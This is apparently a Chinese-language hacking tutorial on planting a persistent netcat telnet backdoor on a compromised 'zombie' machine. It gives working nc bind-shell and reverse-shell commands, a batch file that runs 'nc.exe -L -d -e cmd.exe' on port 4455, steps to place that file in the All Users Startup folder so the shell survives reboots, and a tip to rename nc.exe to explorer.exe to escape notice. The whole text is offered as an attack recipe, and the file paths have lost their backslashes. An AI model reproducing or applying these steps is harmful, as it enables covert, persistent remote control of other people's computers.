通过nc构造telnet后门

nc被称为网络中的“瑞士军刀”，其功能强大，如果在肉鸡上运行“nc.exe –p port –L –d –e cmd.exe”命令就可以构建一个telnet后门，即使关闭了nc.exe程序运行窗口，该后门程序还继续存在。本案例通过一个bat文件来构建一个 telnet后门，当系统重新启动后，该后门会继续存在。当然nc还有许多其它用法：

　　(1)连接到REMOTE主机，格式：nc -nvv 192.168.x.x 80 ，表示连到192.168.x.x的TCP80端口

　　(2)监听LOCAL主机，格式：nc -l -p 80 ，表示监听本机的TCP80端口

　　(3)扫描远程主机，格式：nc -nvv -w2 -z 192.168.x.x 80-445，表示扫描192.168.x.x的TCP80到TCP445的所有端口

　　(4)REMOTE主机绑定SHELL，格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe，表示绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

　　(5)REMOTE主机绑定SHELL并反向连接， 格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口。

　　(6)作攻击程序用，格式：

　　type.exe c:exploit.txt|nc -nvv 192.168.x.x 80

　　nc -nvv 192.168.x.x80

　　连接到192.168.x.x的80端口，并在其管道中发送'c:ex ploit.txt'的内容

　　(7)作蜜罐用，格式：nc -L -p 80 讲解：使用'-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止;格式：nc -L -p 80>c:log.txt 讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到'c:log.txt'中，如果把'& gt;' 改为'>>'即可以追加日志 附：'c:log.txt'为日志等

　　下面主要介绍如何通过nc批处理命令来构建一个telnet类型的后门：

　　1.编辑一个bat文件。

　　在IP地址为192.168.1.19的计算机上新建一个bat文件，取名为“1.bat”，在其中输入以下内容，如图1所示。

　　@

　　@ start

　　@c:nc.exe –p 4455 –L –d –e cmd.exe

　　@exit

　　图1 构建一个bat文件

　　2.将1.bat复制到“All user”的启动文件夹。

　　将“1.bat”文件复制到“C:Documents and SettingsAll Users「开始」菜单程序启动”文件夹下，如图2所示。

　　图2 复制1.bat文件到启动文件夹下

　　3.等待重启后使用telnet连接肉鸡ip。

　　重启计算机后，用户进入计算机后，会执行“1.bat”脚本，会启动nc程序从而开启4455端口。在本地使用命令“telnet 192.168.1.19 4455”连接IP地址192.168.1.19 的计算机的4455端口，如图3所示，可以通过telnet连接肉鸡并在肉鸡上执行各种命令。

　　图3 使用telnet连接肉鸡4455端口

　　技巧

　　可以将nc.exe文件重新命名为其他文件，例如explorer.exe等，这样在任务管理器中看到的nc.exe变成了explorer.exe了，不容易被发觉，而nc命令中加入“-L -d”后即使关闭了nc监听窗口，该命令行还继续存在。

　　小结

　　本案例通过编写bat批处理文件，并将该bat文件放入“C:Documents and SettingsAll Users「开始」菜单程序启动”文件夹下，则无论那个用户登陆，都会启动该bat文件，从而保留nc的telnet后门，该后门只要知道端口，通过 telnet程序可以直接连接